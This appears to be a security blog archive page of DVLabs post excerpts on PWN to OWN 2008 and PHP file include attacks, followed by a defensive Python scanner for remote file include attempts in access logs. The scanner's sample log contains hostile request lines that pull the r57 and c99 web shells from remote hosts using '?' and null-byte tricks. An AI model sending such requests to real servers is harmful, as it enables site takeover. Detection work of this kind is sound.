Today's first day of CanSecWest's PWN to OWN contest is now officially over, and we can report that all three laptops are still standing without having been compromised. At 2:45pm local time today, to much fanfare, Aaron made the official announcement of the contest's opening to the CanSecWest crowd. As a reminder, the rules today allowed only for a contestant to use a ...


CanSecWest PWN to OWN 2008 (updated)

March 24th Update: We've modified the rules and increased the prize amounts. Please see the new rules detailed below. Since the announcement of the ZDI cash prize sponsorship for the CanSecWest PWN to OWN contest, we've received a lot of excellent and much appreciated feedback from the security community regarding the complexity of the original rules and the prize structure. We've gone back to the drawing boar ...


A Bit of History

To say that this post is only tangentially related to security would be stretching the meaning of the word "tangentially" almost to the point of structural failure, but this is just too awesome to pass up. I promise that, this week, I will write a much more interesting and relevant blog post. I've been doing a lot of work lately on TippingPoint's Custom Shield Writer tool, which we conveniently (and lovingly) refer to as "CSW". CSW allows a customer to write their own custom filters to ap ...


PHP File Include Attacks (Part 4 of 4)

Last week I talked about some different strategies for preventing PHP RFI attacks. I also mentioned that proper egress filters are all but foolproof for preventing such attacks. Well, today we are going to learn that this is not entirely true. There is a trick for completely bypassing egress filters called XSS reflection, and today we'll spend our time learning how this technique works. In a standard PHP RFI attack, the attacker will send a link to some malicious PHP code som ...


PHP File Include Attacks (Part 3 of 4)

In the second part of this series on PHP file include vulnerabilities, we talked about the different types of payloads commonly seen in the wild. Today, I'm going to switch gears and talk about some strategies for preventing these attacks. Generally speaking, there are four primary ways to prevent falling victim to a PHP File Include attack. These are:
1. Add an IPS... of course!
2. Modify your PHP configuration via php.ini.
3. When writing PHP, make sure to sanitize all variables ...


PHP File Include Attacks (Part 2 of 4)

In the first part of this series, we talked about what a PHP file include attack is and what it looks like on the wire. This week we'll dive into how attackers are using these vulnerabilities, as well as take a look at some of the payloads they are using. To start, let's look at the different kinds of payloads people are using in the wild. Types of payloads: Sentinels: These payloads contain a simple unique string (or a small PHP function to generate a unique string). T ...


PHP File Include Attacks (Part 1 of 4)

It's true. When polled, 4 out of 4 PHP programmers admit their mothers never once warned them about the dangers of PHP file include vulnerabilities. This is the statistic I use to explain why there are such impressively large numbers of vulnerable PHP applications. But, while lack of motherly guidance is a likely factor, the bigger picture is more complicated. For instance, while PHP file include attacks represented over 20% of all OSVDB entries for 2006...
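Parts 1 and 2 of this series describe what a PHP remote file include attack looks like on the wire and the payloads attackers point the include at. The Python below is an added example, not code from the series or from DVLabs: it scans web server access-log lines for query parameters whose value is a URL to a remote host, marks the two classic RFI tell-tales (a trailing "?" so that whatever the vulnerable script appends to the path becomes a query string on the attacker's server, and a "%00" null byte, which older PHP versions treated as the end of the path), and rates a bare URL-valued parameter as low confidence, since redirectors and proxies pass URLs legitimately. The log lines use documentation address ranges and are constructed for this example; the log format is assumed to be Apache Common Log Format.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Common Log Format: src ident user [ts] "request" status size
CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample lines: two remote include attempts, one ordinary page
# request, and one redirector that legitimately carries a URL parameter.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [21/Jul/2008:10:00:00 -0500] "GET /index.php?page=http://203.0.113.200/r57.txt? HTTP/1.1" 200 512
198.51.100.3 - - [21/Jul/2008:10:00:02 -0500] "GET /modules/view.php?inc=http://198.51.100.3/c99.txt%00 HTTP/1.0" 200 1290
192.0.2.55 - - [21/Jul/2008:10:00:04 -0500] "GET /index.php?page=about HTTP/1.1" 200 4096
192.0.2.56 - - [21/Jul/2008:10:00:05 -0500] "GET /go.php?url=http://www.example.com/ HTTP/1.1" 302 0
"""


def rfi_hits(target):
    """Inspect one request target ("/path?query") for parameters carrying a remote URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if not value.lower().startswith(REMOTE_SCHEMES):
            continue
        # A trailing "?" turns whatever the vulnerable script appends (".php",
        # "/footer.inc") into a query string sent to the attacker's server;
        # "%00" (decoded by parse_qsl to NUL) truncated the path in older PHP.
        strong = value.endswith("?") or "\x00" in value
        remote = value.rstrip("?").replace("\x00", "")
        hits.append({
            "param": name,
            "remote_host": urlsplit(remote).hostname,
            "confidence": "high" if strong else "low",
        })
    return hits


def scan_access_log(lines):
    """Return one alert per (request, parameter) pair that looks like a remote include."""
    alerts = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue
        parts = m["request"].split(" ")
        if len(parts) != 3:  # expect "METHOD target HTTP/x.y"
            continue
        target = parts[1]
        for hit in rfi_hits(target):
            alerts.append({"src": m["src"], "path": urlsplit(target).path, **hit})
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_ACCESS_LOG.splitlines()):
        print(alert)
```

The low-confidence bucket is the blurred line between attacks and legitimate traffic that the ThreatLinQ posts above keep returning to: a URL in a parameter is not by itself an attack, but a URL ending in "?" or carrying a null byte has no honest reason to be there, and the remote_host field is what you feed back into a watch list.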